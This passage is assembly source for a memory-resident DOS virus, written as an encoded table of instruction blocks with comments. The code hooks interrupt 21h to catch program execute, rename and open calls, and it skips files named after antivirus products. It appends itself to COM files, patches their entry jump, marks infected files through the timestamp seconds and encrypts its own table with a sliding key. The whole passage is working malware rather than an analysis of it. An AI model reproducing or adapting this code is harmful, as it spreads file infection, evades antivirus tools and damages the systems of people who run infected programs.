... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of original... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of origina... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AL = last byte of original code ... db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of original code... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block db 11101110b ; Beginning of block dw 1774h db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save incorrect IP at stack db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 01h ; One byte instruction push ax ; Save segment of PSP for current ... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of original... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of origina... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AX = last byte of original code ... db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of original code... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block move_virus__ db 11101110b ; Beginning of block dw 1390h ; Block identification of move_vir... db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 02h ; Two bytes instruction mov ds,ax ; DS = segment of DOS communicatio... db 05h ; Five bytes instruction cmp byte ptr ds:[501h],10h db 01110100b+10000000b ; Already resident? Jump to virus_... dw 65h ; Pointer to virus_exit_ db 05h ; Five bytes instruction mov byte ptr ds:[501h],10h db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 03h ; Three bytes instruction mov ax,ds:[0ch] ; AX = offset within next virus ge... db 03h ; Three bytes instruction sub ax,4000h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store offset of crypt_table db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov cx,ds:[0eh] ; CX = length of virus db 04h ; Four bytes instruction mov [bp+1234h],cx ; Store length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 03h ; Three bytes instruction mov si,4000h ; SI = offset of next virus genera... db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 02h ; Two bytes instruction mov cl,04h ; Divide by paragraphs db 02h ; Two bytes instruction shr di,cl ; DI = length of next virus genera... db 01h ; One byte instruction inc di ; Increase length of next virus ge... db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub bx,di ; Subtract length of next virus ge... db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 02h ; Two bytes instruction cmp bx,di ; Insufficient memory? db 01110010b+10000000b ; Below? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov bx,di ; BX = number of paragraphs to all... db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov es,ax ; ES = segment of current Memory C... db 07h ; Seven bytes instruction mov word ptr es:[01h],08h db 01h ; One byte instruction pop es ; Load ES from stack (AX) db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 02h ; Two bytes instruction xor si,si ; Zero SI db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 01h ; One byte instruction push es ; Save ES at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save offset of virus_exit_ at stack db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = 8-bit sliding encrytion/dec... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 01h ; One byte instruction retf ; Return far db 11101111b ; End of block terminate_ db 11101110b ; Beginning of block dw 0beeh ; Block identification of terminate_ db 03h ; Three bytes instruction mov ax,4c00h ; Terminate with return code db 02h ; Two bytes instruction int 21h db 11101111b ; End of block get_rnd_num_ db 11101110b ; Beginning of block dw 0bd4h ; Block identification of get_rnd_... db 01h ; One byte instruction push cx ; Save CX at stack db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 02h ; Two bytes instruction mov ah,al ; AH = 8-bit random number db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 05h ; Five bytes instruction xor ax,es:[01h] ; AX = 16-bit random number db 02h ; Two bytes instruction mov cl,ah ; CL = high-order byte of 16-bit r... db 02h ; Two bytes instruction rol ax,cl ; AX = 16-bit random number db 04h ; Four bytes instruction mov es:[01h],ax ; Store 16-bit random number db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block rnd_in_rang db 11101110b ; Beginning of block dw 0bd5h ; Block identification of rnd_in_rang db 02h ; Two bytes instruction or bp,bp ; Zero BP? db 01110100b+10000000b ; Zero? Jump to zero_range_ dw 0bd6h ; Pointer to zero_range_ db 01h ; One byte instruction push dx ; Save DX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 02h ; Two bytes instruction div bp ; DX = random number within range db 01h ; One byte instruction xchg ax,dx ; AX = random number within range db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block zero_range_ db 11101110b ; Beginning of block dw 0bd6h ; Block identification of zero_range_ db 02h ; Two bytes instruction xor ax,ax ; AX = random number within range db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_byt db 11101110b ; Beginning of block dw 0be0h ; Block identification of decrypt_byt db 04h ; Four bytes instruction mov [bp+1234h],ah ; Store AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 02h ; Two bytes instruction mov ax,si ; AX = offset within table db 02h ; Two bytes instruction sub ax,bp ; Subtract delta offset from offse... db 03h ; Three bytes instruction sub ax,1234h ; Subtract offset of tmc_table_ fr... db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 04h ; Four bytes instruction mul word ptr [bp+1234h] ; AL = 8-bit sliding encryptio... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 04h ; Four bytes instruction add al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 02h ; Two bytes instruction xor al,[si] ; AL = byte of decrypted table db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = stored AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 01h ; One byte instruction inc si ; Increase offset within table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_id_ db 11101110b ; Beginning of block dw 0be1h ; Block identification of decrypt_id_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction mov ah,al ; AL = byte of decrypted table db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction xchg al,ah ; AL = byte of decrypted table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block virus_exit_ db 11101110b ; Beginning of block dw 65h ; Block identification of virus_exit_ db 01h ; One byte instruction pop es ; Load ES from stack db 02h ; Two bytes instruction mov ah,49h ; Free memory db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 02h ; Two bytes instruction mov ds,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov es,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 04h ; Four bytes instruction lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ db 11101101b ; Data reference dw 1391h ; Pointer of jmp_imm32_ db 01h ; One byte instruction pop ax ; Load AX from stack (initial IP) db 04h ; Four bytes instruction mov cs:[bx+01h],ax ; Store initial IP db 01h ; One byte instruction pop ax ; Load AX from stack (initial CS ...) db 04h ; Four bytes instruction mov cs:[bx+03h],ax ; Store initial CS relative to sta... db 01h ; One byte instruction pop ax ; Load AX from stack (initial SP) db 01h ; One byte instruction pop ss ; Load SS from stack (initial SS ...) db 02h ; Two bytes instruction mov sp,ax ; SP = stack pointer db 11101001b ; JMP imm16 (opcode 0e9h) dw 1391h ; Pointer of jmp_imm32_ db 11101111b ; End of block jmp_imm32_ db 11101110b ; Beginning of block dw 1391h ; Block identification of jmp_imm32_ db 05h+10h ; Five bytes data db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Pointer to virus in top of memory db 11101111b ; End of block ah__ db 11101110b ; Beginning of block dw 0bd9h ; Block identification of ah__ db 01h+10h ; One byte data db 00h ; Accumulator register (high-orde...) db 11101111b ; End of block probability_ db 11101110b ; Beginning of block dw 0bech ; Block identification of probabil... db 02h+10h ; Two bytes data dw 32h ; Probability db 11101111b ; End of block crypt_key_ db 11101110b ; Beginning of block dw 0bd7h ; Block identification of crypt_key_ db 01h+10h ; One byte data db 00h ; 8-bit encryption/decryption key db 11101111b ; End of block sliding_key_ db 11101110b ; Beginning of block dw 0bd8h ; Block identification of sliding_... db 02h+10h ; Two bytes data dw 00h ; 8-bit sliding encryption/decrypt... db 11101111b ; End of block executa_sta db 11101110b ; Beginning of block dw 1388h ; Block identification of executa_sta db 01h+10h ; One byte data db 00h ; Executable status db 11101111b ; End of block origin_code_ db 11101110b ; Beginning of block dw 1f40h ; Block identification of origin_c... db 03h+10h ; Three bytes data db 11000011b,00000010b dup(00h) db 11101111b ; End of block initial_cs_ db 11101110b ; Beginning of block dw 1389h ; Block identification of initial_cs_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial CS relative to start of ... db 11101111b ; End of block initial_ss_ db 11101110b ; Beginning of block dw 138ah ; Block identification of initial_ss_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial SS relative to start of ... db 11101111b ; End of block initial_ip_ db 11101110b ; Beginning of block dw 138bh ; Block identification of initial_ip_ db 02h+10h ; Two bytes data dw 100h ; Initial IP db 11101111b ; End of block incorrec_ip db 11101110b ; Beginning of block dw 1773h ; Block identification of incorrec_ip db 02h+10h ; Two bytes data dw 100h ; Incorrect IP db 11101111b ; End of block initial_sp_ db 11101110b ; Beginning of block dw 138ch ; Block identification of initial_sp_ db 02h+10h ; Two bytes data dw 0fffeh ; Initial SP db 11101111b ; End of block new_mcb_siz db 11101110b ; Beginning of block dw 1393h ; Block identification of new_mcb_siz db 02h+10h ; Two bytes data dw 1000h ; New size in paragraphs db 11101111b ; End of block mcb_size__ db 11101110b ; Beginning of block dw 1395h ; Block identification of mcb_size__ db 02h+10h ; Two bytes data dw 0ffffh ; Size of memory block in paragraphs db 11101111b ; End of block mcb_size___ db 11101110b ; Beginning of block dw 1394h ; Block identification of mcb_siz... db 02h+10h ; Two bytes data dw 00h ; Size of memory block in paragraphs db 11101111b ; End of block program_seg_ db 11101110b ; Beginning of block dw 0befh ; Block identification of program_... db 02h+10h ; Two bytes data dw 00h ; Segment of PSP for current process db 11101111b ; End of block virus_lengt db 11101110b ; Beginning of block dw 0bf0h ; Block identification of virus_lengt db 02h+10h ; Two bytes data dw 00h ; Length of virus db 11101111b ; End of block vir_exit_of db 11101110b ; Beginning of block dw 0bf1h ; Block identification of vir_exit_of db 02h+10h ; Two bytes data dw 00h ; Offset of virus_exit_ db 11101111b ; End of block tmc_table_ db 11101110b ; Beginning of block dw 4c5h ; Block identification of tmc_table_ db 11101111b ; End of block db 00h ; End of table second_table db 11101111b ; End of block virus_end: crypt_table db 11101110b ; Beginning of block dw 66h ; Block identification of crypt_table db 02h ; Two bytes instruction xor bp,bp ; BP = delta offset db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 03h ; Three bytes instruction mov ds:[1234h],al ; Store 8-bit encryption/decryptio... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 03h ; Three bytes instruction mov ax,3521h ; Get interrupt vector 21h db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction mov di,1234h ; DI = offset of int21_jump db 11101101b ; Data reference dw 0c9h ; Pointer to int21_jump db 03h ; Three bytes instruction mov [di+01h],bx ; Store offset of interrupt 21h db 03h ; Three bytes instruction mov [di+03h],es ; Store segment of interrupt 21h db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int21_virus db 11101101b ; Data reference dw 0c8h ; Pointer to int21_virus db 03h ; Three bytes instruction mov ax,2521h ; Set interrupt vector 21h db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 65h ; Pointer to virus_exit_ db 11101111b ; End of block crypt_table_ db 11101110b ; Beginning of block dw 0bfeh ; Block identification of crypt_ta... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(code_end-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bffh ; Pointer to crypt_loop db 11101111b ; End of block crypt_loop db 11101110b ; Beginning of block dw 0bffh ; Block identification of crypt_lo... db 02h ; Two bytes instruction xor [si],al ; Encrypt byte of table db 01h ; One byte instruction inc si ; Increase offset within table db 02h ; Two bytes instruction add al,ah ; Add 8-bit sliding encryption key... db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to crypt_loop dw 0bffh ; Pointer to crypt_loop db 01h ; One byte instruction ret ; Return db 11101111b ; End of block int21_virus db 11101110b ; Beginning of block dw 0c8h ; Block identification of int21_virus db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bx ; Save BX at stack db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 01h ; One byte instruction push si ; Save SI at stack db 01h ; One byte instruction push di ; Save DI at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction cld ; Clear direction flag db 03h ; Three bytes instruction cmp ah,4bh ; Load and/or execute program? db 01110100b+10000000b ; Equal? Jump to find_zero dw 1392h ; Pointer to find_zero db 03h ; Three bytes instruction cmp ah,56h ; Rename file? db 01110100b+10000000b ; Equal? Jump to find_zero dw 1392h ; Pointer to find_zero db 03h ; Three bytes instruction cmp ah,3dh ; Open file? db 01110101b+10000000b ; Not equal? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 1392h ; Pointer to find_zero db 11101111b ; End of block find_zero db 11101110b ; Beginning of block dw 1392h ; Block identification of find_zero db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction pop es ; Load ES from stack (DS) db 02h ; Two bytes instruction mov di,dx ; DI = offset of filename db 03h ; Three bytes instruction mov cx,43h ; CX = number of bytes to search t... db 02h ; Two bytes instruction xor al,al ; Zero AL db 02h ; Two bytes instruction repne scasb ; Find end of filename db 01110101b+10000000b ; Not equal? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction lea si,[di-05h] ; SI = offset of the dot in the fi... db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction mov bx,'mo' ; COM executable db 03h ; Three bytes instruction cmp ax,'c.' ; COM executable? db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 03h ; Three bytes instruction mov bx,'ex' ; EXE executable db 03h ; Three bytes instruction cmp ax,'e.' ; EXE executable? db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to int21_exit db 11101111b ; End of block examine_ext db 11101110b ; Beginning of block dw 0f0h ; Block identification of examine_ext db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 02h ; Two bytes instruction cmp ax,bx ; COM or EXE executable? db 01110101b+10000000b ; Not equal? Jump to examine_ext dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction sub si,04h ; SI = offset of the dot in the fi... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1398h ; Pointer to find_name db 11101111b ; End of block find_name db 11101110b ; Beginning of block dw 1398h ; Block identification of find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 02h ; Two bytes instruction mov al,[si] ; AL = byte of filename db 02h ; Two bytes instruction cmp al,'/' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,'\' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,':' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp si,dx ; Beginning of filename? db 01110111b+10000000b ; Above? Jump to find_name dw 1398h ; Pointer to find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 11101001b ; JMP imm16 (opcode 0e9h) dw 1397h ; Pointer to examine_name db 11101111b ; End of block examine_name db 11101110b ; Beginning of block dw 1397h ; Block identification of examine_... db 01h ; One byte instruction inc si ; SI = offset of beginning of file... db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction xor ax,0aa55h ; Encrypt two bytes of filename db 03h ; Three bytes instruction cmp ax,('ci' xor 0aa55h) db 01110100b+10000000b ; Equal? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('on' xor 0aa55h) db 01110100b+10000000b ; NOD-iCE? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('ew' xor 0aa55h) db 01110100b+10000000b ; Dr. Web? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('bt' xor 0aa55h) db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('va' xor 0aa55h) db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('-f' xor 0aa55h) db 01110100b+10000000b ; F-PROT? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('cs' xor 0aa55h) db 01110100b+10000000b ; McAfee ViruScan? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('oc' xor 0aa55h) db 01110100b+10000000b ; COMMAND.COM? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('iw' xor 0aa55h) db 01110100b+10000000b ; WIN.COM? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 03h ; Three bytes instruction cmp ax,('rk' xor 0aa55h) db 01110100b+10000000b ; Equal? Jump to int21_exit dw 0fbh ; Pointer to int21_exit db 02h ; Two bytes instruction mov cx,ds ; CX = segment of filename db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack db 03h ; Three bytes instruction mov ax,3524h ; Get interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction push bx ; Save BX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int24_virus db 11101101b ; Data reference dw 1770h ; Pointer to int24_virus db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop dx ; Load DX from stack db 02h ; Two bytes instruction mov ds,cx ; DS = segment of filename db 02h ; Two bytes instruction mov es,cx ; ES = segment of filename db 03h ; Three bytes instruction mov ax,3d02h ; Open file (read/write) db 03h ; Three bytes instruction mov bx,1234h ; BX = offset of int21_jump db 11101101b ; Data reference dw 0c9h ; Pointer to int21_jump db 01h ; One byte instruction inc bx ; BX = offset of address of interr... db 01h ; One byte instruction pushf ; Save flags at stack db 03h ; Three bytes instruction call dword ptr cs:[bx] db 01110010b+10000000b ; Error? Jump to int24_store dw 1771h ; Pointer to int24_store db 02h ; Two bytes instruction mov bx,ax ; BX = file handle db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction mov ax,5700h ; Get file's date and time db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 04h ; Four bytes instruction mov ds:[1234h],dx ; Store file's date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction mov al,cl ; AL = low-order byte of file time db 02h ; Two bytes instruction and al,00011111b ; AL = file seconds db 02h ; Two bytes instruction cmp al,00000100b ; Already infected (8 seconds)? db 01110100b+10000000b ; Equal? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction and cl,11100000b ; Zero file seconds db 03h ; Three bytes instruction or cl,00000100b ; Set infection mark (8 seconds) db 04h ; Four bytes instruction mov ds:[1234h],cx ; Store file's time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 02h ; Two bytes instruction mov ah,3fh ; Read from file db 03h ; Three bytes instruction mov cx,03h ; Read three bytes db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 02h ; Two bytes instruction mov si,dx ; SI = offset of origin_code_ db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction lodsw ; AX = EXE signature db 03h ; Three bytes instruction cmp ax,'ZM' ; EXE signature? db 01110100b+10000000b ; Equal? Jump to infect_exe dw 138dh ; Pointer to infect_exe db 03h ; Three bytes instruction cmp ax,'MZ' ; EXE signature? db 01110100b+10000000b ; Equal? Jump to infect_exe dw 138dh ; Pointer to infect_exe db 03h ; Three bytes instruction mov si,1234h ; SI = offset of initial_cs_ db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 04h ; Four bytes instruction mov [si],0fff0h ; Store initial CS relative to sta... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of initial_ss_ db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 04h ; Four bytes instruction mov [si],0fff0h ; Store initial SS relative to sta... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of initial_ip_ db 11101101b ; Data reference dw 138bh ; Pointer to initial IP db 04h ; Four bytes instruction mov [si],100h ; Store initial IP db 03h ; Three bytes instruction mov si,1234h ; SI = offset of initial_sp_ db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov [si],0fffeh ; Store initial SP db 03h ; Three bytes instruction mov si,1234h ; SI = offset of mcb_size__ db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 04h ; Four bytes instruction mov [si],0ffffh ; Store size of memory block in pa... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of new_mcb_siz db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 04h ; Four bytes instruction mov [si],1000h ; Store new size in paragraphs db 02h ; Two bytes instruction mov al,00h ; COM executable db 03h ; Three bytes instruction mov ds:[1234h],al ; Store executable status db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 03h ; Three bytes instruction mov ax,4202h ; Set current file position (EOF) db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; DX = low-order word of offset f... db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction cmp ax,0e000h ; Filesize too large? db 01110111b+10000000b ; Above? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 03h ; Three bytes instruction add ax,100h ; AX = delta offset db 03h ; Three bytes instruction mov ds:[01h],ax ; Store delta offset db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 03h ; Three bytes instruction mov cx,1234h ; CX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop ax ; Load AX from stack db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 01h ; One byte instruction push ax ; Save AX at stack db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction xor cx,cx ; CX = high-order word of offset f... db 02h ; Two bytes instruction xor dx,dx ; DX = low-order word of offset fr... db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop ax ; Load AX from stack db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 03h ; Three bytes instruction mov di,1234h ; DI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 02h ; Two bytes instruction mov dx,di ; DX = offset of origin_code_ db 03h ; Three bytes instruction mov byte ptr [di],11101001b db 03h ; Three bytes instruction sub ax,03h ; AX = offset of virus within infe... db 03h ; Three bytes instruction mov [di+01h],ax ; Store offset of virus within inf... db 03h ; Three bytes instruction mov cx,03h ; Write three bytes db 02h ; Two bytes instruction mov ah,40h ; Write to file db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to close_file dw 0fah ; Pointer to close_file db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to set_file_inf db 11101111b ; End of block set_file_inf db 11101110b ; Beginning of block dw 138eh ; Block identification of set_file... db 03h ; Three bytes instruction mov ax,5701h ; Set file's date and time db 04h ; Four bytes instruction mov cx,ds:[1234h] ; CX = new time db 11101101b ; Data reference dw 12ch ; Pointer to file_time db 04h ; Four bytes instruction mov dx,ds:[1234h] ; DX = new date db 11101101b ; Data reference dw 12dh ; Pointer to file_date db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fah ; Block identification of close_file db 11101111b ; End of block close_file db 11101110b 